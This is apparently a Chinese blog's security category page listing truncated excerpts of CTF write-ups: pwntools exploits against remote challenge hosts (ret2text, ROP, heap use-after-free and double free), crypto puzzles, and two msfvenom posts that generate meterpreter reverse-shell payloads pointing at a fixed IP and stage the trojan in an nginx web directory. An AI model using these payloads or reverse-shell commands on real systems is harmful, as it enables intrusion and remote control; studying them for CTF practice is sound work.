文章分类 - 安全
网络安全
摘要:from pwn import * from LibcSearcher import * #p = process("./Game") p = remote("1.95.36.136", 2066) elf = ELF("./Game") p.sendlineafter(b"Do you play
阅读全文
posted @ 2025-04-26 21:52
lethe311
摘要:heap_Double_Free int __fastcall __noreturn main(int argc, const char **argv, const char **envp) { int v3; // ebx int Choice; // [rsp+4h] [rbp-7Ch] BYR
阅读全文
posted @ 2025-04-25 22:59
lethe311
摘要:heap_Easy_Uaf Ida反汇编 int __cdecl Are() { int result; // eax int size; // [rsp+4h] [rbp-1Ch] BYREF char *a; // [rsp+8h] [rbp-18h] char *b; // [rsp+10h]
阅读全文
posted @ 2025-04-24 10:57
lethe311
摘要:int __fastcall main(int argc, const char **argv, const char **envp) { char format[200]; // [rsp+0h] [rbp-D0h] BYREF unsigned __int64 v5; // [rsp+C8h]
阅读全文
posted @ 2025-04-24 00:14
lethe311
摘要:ROPgadget --binary ret2syscall |grep "pop" |grep "eax" |grep "ret" ROPgadget --binary ret2syscall --only "pop|eax|ret" from pwn import * r = process("
阅读全文
posted @ 2025-04-23 22:32
lethe311
摘要:from pwn import * r = remote("challenge-4866f3c186b2dcc2.sandbox.ctfhub.com", 27658) rdi = 0x4008a3 sys = 0x400620 sh = 0x4008cb ret = 0x400285 payloa
阅读全文
posted @ 2025-04-23 20:08
lethe311
摘要:C代码 #include<iostream> #include <string> #include <cstring> // 添加memset函数需要的头文件 using namespace std; #include<iostream> #include <string> using namesp
阅读全文
posted @ 2025-04-23 15:28
lethe311
摘要:卷王杯 pwn签到题 int __fastcall main(int argc, const char **argv, const char **envp) { char v4[32]; // [rsp+0h] [rbp-20h] BYREF alarm(0x3Cu); setvbuf(stdout
阅读全文
posted @ 2025-04-22 18:10
lethe311
摘要:wuqian int __fastcall main(int argc, const char **argv, const char **envp) { char v4[16]; // [rsp+0h] [rbp-10h] BYREF system("echo -n \"What's your na
阅读全文
posted @ 2025-04-22 15:10
lethe311
摘要:1024_happy_stack 题目: int __fastcall main(int argc, const char **argv, const char **envp) { char s[892]; // [rsp+0h] [rbp-380h] BYREF setvbuf(stdin, 0L
阅读全文
posted @ 2025-04-22 12:58
lethe311
摘要:ctf秀 pwn10 题目: // bad sp value at call has been detected, the output may be wrong! int __cdecl main(int argc, const char **argv, const char **envp) {
阅读全文
posted @ 2025-04-22 09:32
lethe311
摘要:router c伪代码: int __fastcall main(int argc, const char **argv, const char **envp) { int v4; // [rsp+Ch] [rbp-74h] BYREF char buf[16]; // [rsp+10h] [rbp
阅读全文
posted @ 2025-04-21 23:02
lethe311
摘要:babyrouter from pwn import * from LibcSearcher import * context(os="linux",arch="amd64",log_level="debug") r = remote("pwn.challenge.ctf.show", 28206)
阅读全文
posted @ 2025-04-21 22:22
lethe311
摘要:36D杯 签到 from pwn import * r = remote("pwn.challenge.ctf.show", 28249) rdi = 0x04006d3 ret = 0x4004ce system = 0x4004e0 sh = 0x601040 payload = b'a'*(0
阅读全文
posted @ 2025-04-21 19:40
lethe311
摘要:01栈溢出之ret2text from pwn import * r = remote("pwn.challenge.ctf.show", 28107) payload = b'a'*(0x80+8) + p64(0x4004fe) + p64(0x400637) r.sendline(payloa
阅读全文
posted @ 2025-04-21 18:57
lethe311
摘要:msf对kali上马 msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=8.152.213.83 lport=7997 -f elf -o nw40 把木马移动到网页 cp nw40 /usr/share/nginx/html/www.test.
阅读全文
posted @ 2025-04-20 21:30
lethe311
摘要:题目: 这是什么,怎么看起来像是再算64卦!!! 密文:升随临损巽睽颐萃小过讼艮颐小过震蛊屯未济中孚艮困恒晋升损蛊萃蛊未济巽解艮贲未济观豫损蛊晋噬嗑晋旅解大畜困未济随蒙升解睽未济井困未济旅萃未济震蒙未济师涣归妹大有 嗯?为什么还有个b呢? b=7 flag:请按照格式BJD{} # -- codin
阅读全文
posted @ 2025-04-20 00:52
lethe311
摘要:利用msfvenom生成shellcode msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=8.152.213.83 lport=7719 -f c [-] No platform was selected, choosing Msf::M
阅读全文
posted @ 2025-04-19 13:01
lethe311
摘要:题目: from Crypto.Util.number import bytes_to_long from secrets import p,q,r,s,t,flag n = p * q * r * s * t e = 2 m = bytes_to_long(os.urandom(500) + fl
阅读全文
posted @ 2025-04-19 01:01
lethe311
摘要:题目: Y3NldHRfZl9jc2FyaF95b3Nwd2l0JTdCbW9qcCF1bCU3RA== 首先分析是base64 得到csett_f_csarh_yospwit%7Bmojp!ul%7D 看到%想到url 得到csett_f_csarh_yospwit{mojp!ul} 看到乱序想到
阅读全文
posted @ 2025-04-18 22:16
lethe311
浙公网安备 33010602011771号